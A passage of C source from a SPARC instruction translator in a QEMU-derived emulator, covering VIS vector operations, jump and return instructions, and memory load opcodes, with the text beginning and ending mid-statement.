0x001: /* VIS II edge8n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x002: /* VIS I edge8lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x003: /* VIS II edge8ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x004: /* VIS I edge16cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x005: /* VIS II edge16n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x006: /* VIS I edge16lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x007: /* VIS II edge16ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x008: /* VIS I edge32cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x009: /* VIS II edge32n */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x00a: /* VIS I edge32lcc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x00b: /* VIS II edge32ln */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x010: /* VIS I array8 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x012: /* VIS I array16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = 
gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x014: /* VIS I array32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x018: /* VIS I alignaddr */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_alignaddr(tcg_ctx, cpu_dst, cpu_src1, cpu_src2, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 0x01a: /* VIS I alignaddrl */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_alignaddr(tcg_ctx, cpu_dst, cpu_src1, cpu_src2, 1); gen_store_gpr(dc, rd, cpu_dst); break; case 0x019: /* VIS II bmask */ CHECK_FPU_FEATURE(dc, VIS2); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gsr, tcg_ctx->cpu_gsr, cpu_dst, 32, 32); gen_store_gpr(dc, rd, cpu_dst); break; case 0x020: /* VIS I fcmple16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmple16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x022: /* VIS I fcmpne16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpne16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x024: /* VIS I fcmple32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmple32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x026: /* VIS I fcmpne32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpne32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x028: /* VIS I fcmpgt16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpgt16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02a: /* VIS I fcmpeq16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpeq16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02c: /* VIS I fcmpgt32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpgt32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x02e: /* VIS I fcmpeq32 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_helper_fcmpeq32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); gen_store_gpr(dc, rd, cpu_dst); break; case 0x031: /* VIS I fmul8x16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16); break; case 0x033: /* VIS I fmul8x16au */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16au); break; case 0x035: /* VIS I fmul8x16al */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16al); break; case 0x036: /* VIS I 
fmul8sux16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8sux16); break; case 0x037: /* VIS I fmul8ulx16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8ulx16); break; case 0x038: /* VIS I fmuld8sux16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8sux16); break; case 0x039: /* VIS I fmuld8ulx16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8ulx16); break; case 0x03a: /* VIS I fpack32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpack32); break; case 0x03b: /* VIS I fpack16 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); cpu_dst_32 = gen_dest_fpr_F(dc); gen_helper_fpack16(tcg_ctx, cpu_dst_32, tcg_ctx->cpu_gsr, cpu_src1_64); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x03d: /* VIS I fpackfix */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); cpu_dst_32 = gen_dest_fpr_F(dc); gen_helper_fpackfix(tcg_ctx, cpu_dst_32, tcg_ctx->cpu_gsr, cpu_src1_64); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x03e: /* VIS I pdist */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDDD(dc, rd, rs1, rs2, gen_helper_pdist); break; case 0x048: /* VIS I faligndata */ CHECK_FPU_FEATURE(dc, VIS1); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_faligndata); break; case 0x04b: /* VIS I fpmerge */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpmerge); break; case 0x04c: /* VIS II bshuffle */ CHECK_FPU_FEATURE(dc, VIS2); gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_bshuffle); break; case 0x04d: /* VIS I fexpand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fexpand); break; case 0x050: /* VIS I fpadd16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd16); break; case 0x051: /* VIS I fpadd16s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpadd16s); break; case 0x052: /* VIS I fpadd32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd32); break; case 0x053: /* VIS I fpadd32s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_add_i32); break; case 0x054: /* VIS I fpsub16 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub16); break; case 0x055: /* VIS I fpsub16s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpsub16s); break; case 0x056: /* VIS I fpsub32 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub32); break; case 0x057: /* VIS I fpsub32s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_sub_i32); break; case 0x060: /* VIS I fzero */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_64 = gen_dest_fpr_D(dc, rd); tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, 0); gen_store_fpr_D(dc, rd, cpu_dst_64); break; case 0x061: /* VIS I fzeros */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, 0); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x062: /* VIS I fnor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nor_i64); break; case 0x063: /* VIS I fnors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nor_i32); break; case 0x064: /* VIS I fandnot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_andc_i64); break; case 0x065: /* VIS I fandnot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_andc_i32); break; case 0x066: 
/* VIS I fnot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DD(dc, rd, rs2, tcg_gen_not_i64); break; case 0x067: /* VIS I fnot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FF(dc, rd, rs2, tcg_gen_not_i32); break; case 0x068: /* VIS I fandnot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_andc_i64); break; case 0x069: /* VIS I fandnot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_andc_i32); break; case 0x06a: /* VIS I fnot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DD(dc, rd, rs1, tcg_gen_not_i64); break; case 0x06b: /* VIS I fnot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FF(dc, rd, rs1, tcg_gen_not_i32); break; case 0x06c: /* VIS I fxor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_xor_i64); break; case 0x06d: /* VIS I fxors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_xor_i32); break; case 0x06e: /* VIS I fnand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nand_i64); break; case 0x06f: /* VIS I fnands */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nand_i32); break; case 0x070: /* VIS I fand */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_and_i64); break; case 0x071: /* VIS I fands */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_and_i32); break; case 0x072: /* VIS I fxnor */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_eqv_i64); break; case 0x073: /* VIS I fxnors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_eqv_i32); break; case 0x074: /* VIS I fsrc1 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs1); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x075: /* VIS I fsrc1s */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_32 = gen_load_fpr_F(dc, rs1); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x076: /* VIS I fornot2 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_orc_i64); break; case 0x077: /* VIS I fornot2s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_orc_i32); break; case 0x078: /* VIS I fsrc2 */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_64 = gen_load_fpr_D(dc, rs2); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x079: /* VIS I fsrc2s */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1_32 = gen_load_fpr_F(dc, rs2); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x07a: /* VIS I fornot1 */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_orc_i64); break; case 0x07b: /* VIS I fornot1s */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_orc_i32); break; case 0x07c: /* VIS I for */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_or_i64); break; case 0x07d: /* VIS I fors */ CHECK_FPU_FEATURE(dc, VIS1); gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_or_i32); break; case 0x07e: /* VIS I fone */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_64 = gen_dest_fpr_D(dc, rd); tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, -1); gen_store_fpr_D(dc, rd, cpu_dst_64); break; case 0x07f: /* VIS I fones */ CHECK_FPU_FEATURE(dc, VIS1); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, -1); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x080: /* VIS I shutdown */ case 0x081: /* VIS II siam */ // XXX goto illegal_insn; default: goto illegal_insn; } #else goto ncp_insn; #endif } else if (xop == 0x37) { /* V8 CPop2, V9 impdep2 */ #ifdef TARGET_SPARC64 goto illegal_insn; #else goto ncp_insn; #endif #ifdef TARGET_SPARC64 } else 
if (xop == 0x39) { /* V9 return */ save_state(dc); cpu_src1 = get_src1(dc, insn); cpu_tmp0 = get_temp_tl(dc); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2) { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); } else { tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); } } gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; goto jmp_insn; #endif } else { cpu_src1 = get_src1(dc, insn); cpu_tmp0 = get_temp_tl(dc); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2) { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); } else { tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); } } switch (xop) { case 0x38: /* jmpl */ { TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, dc->pc); gen_store_gpr(dc, rd, t); gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); gen_address_mask(dc, cpu_tmp0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; } goto jmp_insn; #if !defined(TARGET_SPARC64) case 0x39: /* rett, V9 return */ { if (!supervisor(dc)) goto priv_insn; gen_mov_pc_npc(dc); gen_check_align(tcg_ctx, cpu_tmp0, 3); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_npc, cpu_tmp0); dc->npc = DYNAMIC_PC; gen_helper_rett(tcg_ctx, tcg_ctx->cpu_env); } goto jmp_insn; #endif case 0x3b: /* flush */ if (!((dc)->def->features & CPU_FEATURE_FLUSH)) goto unimp_flush; /* nop */ break; case 0x3c: /* save */ gen_helper_save(tcg_ctx, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_tmp0); break; case 0x3d: /* restore */ gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_tmp0); break; #if defined(TARGET_SPARC64) case 0x3e: /* V9 done/retry */ { switch (rd) { case 0: if (!supervisor(dc)) goto priv_insn; dc->npc = DYNAMIC_PC; dc->pc = DYNAMIC_PC; if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_done(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } goto jmp_insn; case 1: if (!supervisor(dc)) goto priv_insn; dc->npc = DYNAMIC_PC; dc->pc = DYNAMIC_PC; if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_retry(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } goto jmp_insn; default: goto illegal_insn; } } break; #endif default: goto illegal_insn; } } break; } break; case 3: /* load/store instructions */ { unsigned int xop = GET_FIELD(insn, 7, 12); /* ??? gen_address_mask prevents us from using a source register directly. Always generate a temporary. 
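The temporary is then updated in place by the offset add and by address masking without touching the guest register.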
*/ TCGv cpu_addr = get_temp_tl(dc); tcg_gen_mov_tl(tcg_ctx, cpu_addr, get_src1(dc, insn)); if (xop == 0x3c || xop == 0x3e) { /* V9 casa/casxa : no offset */ } else if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); if (simm != 0) { tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, simm); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 != 0) { tcg_gen_add_tl(tcg_ctx, cpu_addr, cpu_addr, gen_load_gpr(dc, rs2)); } } if (xop < 4 || (xop > 7 && xop < 0x14 && xop != 0x0e) || (xop > 0x17 && xop <= 0x1d ) || (xop > 0x2c && xop <= 0x33) || xop == 0x1f || xop == 0x3d) { TCGv cpu_val = gen_dest_gpr(dc, rd); switch (xop) { case 0x0: /* ld, V9 lduw, load unsigned word */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld32u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x1: /* ldub, load unsigned byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld8u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x2: /* lduh, load unsigned halfword */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld16u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x3: /* ldd, load double word */ if (rd & 1) goto illegal_insn; else { TCGv_i64 t64; gen_address_mask(dc, cpu_addr); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, t64, cpu_addr, dc->mem_idx); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); gen_store_gpr(dc, rd + 1, cpu_val); tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); tcg_temp_free_i64(tcg_ctx, t64); tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); } break; case 0x9: /* ldsb, load signed byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld8s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0xa: /* ldsh, load signed halfword */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld16s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0xd: /* ldstub */ gen_ldstub(dc, cpu_val, cpu_addr, dc->mem_idx); break; case 0x0f: /* swap, swap register with memory. Also atomically */ CHECK_IU_FEATURE(dc, SWAP); cpu_src1 = gen_load_gpr(dc, rd); gen_swap(dc, cpu_val, cpu_src1, cpu_addr, dc->mem_idx, MO_TEUL); break; case 0x10: /* lda, V9 lduwa, load word alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEUL); break; case 0x11: /* lduba, load unsigned byte alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_UB); break; case 0x12: /* lduha, load unsigned halfword alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEUW); break; case 0x13: /* ldda, load double word alternate */ if (rd & 1) { goto illegal_insn; } gen_ldda_asi(dc, cpu_addr, insn, rd); goto skip_move; case 0x19: /* ldsba, load signed byte alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_SB); break; case 0x1a: /* ldsha, load signed halfword alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TESW); break; case 0x1d: /* ldstuba -- XXX: should be atomically */ gen_ldstub_asi(dc, cpu_val, cpu_addr, insn); break; case 0x1f: /* swapa, swap reg with alt. memory. 
Also atomically */ CHECK_IU_FEATURE(dc, SWAP); cpu_src1 = gen_load_gpr(dc, rd); gen_swap_asi(dc, cpu_val, cpu_src1, cpu_addr, insn); break; #ifndef TARGET_SPARC64 case 0x30: /* ldc */ case 0x31: /* ldcsr */ case 0x33: /* lddc */ goto ncp_insn; #endif #ifdef TARGET_SPARC64 case 0x08: /* V9 ldsw */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld32s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x0b: /* V9 ldx */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld64(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x18: /* V9 ldswa */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TESL); break; case 0x1b: /* V9 ldxa */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEQ); break; case 0x2d: /* V9 prefetch, no effect */ goto skip_move; case 0x30: /* V9 ldfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 4, rd); gen_update_fprs_dirty(dc, rd); goto skip_move; case 0x33: /* V9 lddfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); gen_update_fprs_dirty(dc, DFPREG(rd)); goto skip_move; case 0x3d: /* V9 prefetcha, no effect */ goto skip_move; case 0x32: /* V9 ldqfa */ CHECK_FPU_FEATURE(dc, FLOAT128); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); goto skip_move; #endif default: goto illegal_insn; } gen_store_gpr(dc, rd, cpu_val); skip_move: ; } else if (xop >= 0x20 && xop < 0x24) { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (xop) { case 0x20: /* ldf, load fpreg */ gen_address_mask(dc, cpu_addr); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_qemu_ld_i32(tcg_ctx, cpu_dst_32, cpu_addr, dc->mem_idx, MO_TEUL); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x21: /* ldfsr, V9 ldxfsr */ #ifdef TARGET_SPARC64 gen_address_mask(dc, cpu_addr); if (rd == 1) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t64, cpu_addr, dc->mem_idx, MO_TEQ); gen_helper_ldxfsr(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, tcg_ctx->cpu_fsr, t64); tcg_temp_free_i64(tcg_ctx, t64); break; } #endif cpu_dst_32 = get_temp_i32(dc); tcg_gen_qemu_ld_i32(tcg_ctx, cpu_dst_32, cpu_addr, dc->mem_idx, MO_TEUL); gen_helper_ldfsr(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, tcg_ctx->cpu_fsr, cpu_dst_32); break; case 0x22: /* ldqf, load quad fpreg */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_address_mask(dc, cpu_addr); cpu_src1_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, 8); cpu_src2_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_src2_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); gen_store_fpr_Q(dc, rd, cpu_src1_64, cpu_src2_64); tcg_temp_free_i64(tcg_ctx, cpu_src1_64); tcg_temp_free_i64(tcg_ctx, cpu_src2_64); break; case 0x23: /* lddf, load double fpreg */ gen_address_mask(dc, cpu_addr); cpu_dst_64 = 